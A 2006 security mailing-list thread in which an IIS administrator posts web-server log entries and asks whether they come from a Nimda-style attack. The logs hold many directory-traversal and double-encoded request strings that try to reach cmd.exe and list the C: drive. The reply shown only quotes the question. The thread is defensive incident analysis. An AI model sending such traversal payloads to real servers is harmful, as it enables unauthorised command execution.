Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
Focus on Microsoft
Back to list
|
Post reply
IIS http error log entries...
Dec 12 2006 03:01PM
nemanja janic centroproizvod co yu
(1 replies)
Hello list,
i hope i got the right group,
i just found these in my IIS logs:
-----------------------
2006-12-08 11:38:18 87.17.7.5 2842 192.168.x.x 80 HTTP/1.0 HEAD /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:29 87.17.7.5 2929 192.168.x.x 80 HTTP/1.0 HEAD /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:44 87.17.7.5 2872 192.168.x.x 80 HTTP/1.0 HEAD /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:44 87.17.7.5 3420 192.168.x.x 80 HTTP/1.0 HEAD /Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:58 87.17.7.5 1332 192.168.x.x 80 HTTP/1.0 HEAD /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32
/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:58 87.17.7.5 2105 192.168.x.x 80 HTTP/1.0 HEAD /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/
c+dir+c:\ 400 - URL -
2006-12-08 11:39:46 87.17.7.5 2435 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond -
2006-12-08 11:40:36 87.17.7.5 1933 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond -
2006-12-08 11:40:41 87.17.7.5 4144 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond -
2006-12-08 11:40:44 87.17.7.5 4234 192.168.x.x 80 HTTP/1.0 HEAD /msaDC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:40:50 87.17.7.5 1130 192.168.x.x 80 HTTP/1.0 HEAD /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
+c:\ 400 - URL -
2006-12-08 11:40:50 87.17.7.5 1411 192.168.x.x 80 HTTP/1.0 HEAD /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:41:11 87.17.7.5 1427 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond -
2006-12-08 11:41:24 87.17.7.5 4715 192.168.x.x 80 HTTP/1.0 HEAD /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winn
t/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:41:35 87.17.7.5 1568 192.168.x.x 80 HTTP/1.0 HEAD /msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:
\ 400 - URL -
2006-12-08 11:41:41 87.17.7.5 4751 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond -
2006-12-08 11:41:44 87.17.7.5 1595 192.168.x.x 80 HTTP/1.0 HEAD /msadc/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
-------------------------
I don't have much expirience with this kind of thing, and from digging the net i found that this was used in Nimda attacks few years ago... any idea what's going on? Should i be worried?
------------------------------------------------------------------------
---
------------------------------------------------------------------------
---
[ reply ]
RE: IIS http error log entries...
Dec 13 2006 05:17AM
Wayne S. Anderson (wfrazee wynweb net)
Privacy Statement
Copyright 2008, SecurityFocus
i hope i got the right group,
i just found these in my IIS logs:
-----------------------
2006-12-08 11:38:18 87.17.7.5 2842 192.168.x.x 80 HTTP/1.0 HEAD /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:29 87.17.7.5 2929 192.168.x.x 80 HTTP/1.0 HEAD /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:44 87.17.7.5 2872 192.168.x.x 80 HTTP/1.0 HEAD /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:44 87.17.7.5 3420 192.168.x.x 80 HTTP/1.0 HEAD /Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:58 87.17.7.5 1332 192.168.x.x 80 HTTP/1.0 HEAD /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32
/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:58 87.17.7.5 2105 192.168.x.x 80 HTTP/1.0 HEAD /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/
c+dir+c:\ 400 - URL -
2006-12-08 11:39:46 87.17.7.5 2435 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond -
2006-12-08 11:40:36 87.17.7.5 1933 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond -
2006-12-08 11:40:41 87.17.7.5 4144 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond -
2006-12-08 11:40:44 87.17.7.5 4234 192.168.x.x 80 HTTP/1.0 HEAD /msaDC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:40:50 87.17.7.5 1130 192.168.x.x 80 HTTP/1.0 HEAD /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
+c:\ 400 - URL -
2006-12-08 11:40:50 87.17.7.5 1411 192.168.x.x 80 HTTP/1.0 HEAD /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:41:11 87.17.7.5 1427 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond -
2006-12-08 11:41:24 87.17.7.5 4715 192.168.x.x 80 HTTP/1.0 HEAD /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winn
t/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:41:35 87.17.7.5 1568 192.168.x.x 80 HTTP/1.0 HEAD /msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:
\ 400 - URL -
2006-12-08 11:41:41 87.17.7.5 4751 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond -
2006-12-08 11:41:44 87.17.7.5 1595 192.168.x.x 80 HTTP/1.0 HEAD /msadc/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
-------------------------
I don't have much expirience with this kind of thing, and from digging the net i found that this was used in Nimda attacks few years ago... any idea what's going on? Should i be worried?
------------------------------------------------------------------------
---
------------------------------------------------------------------------
---
[ reply ]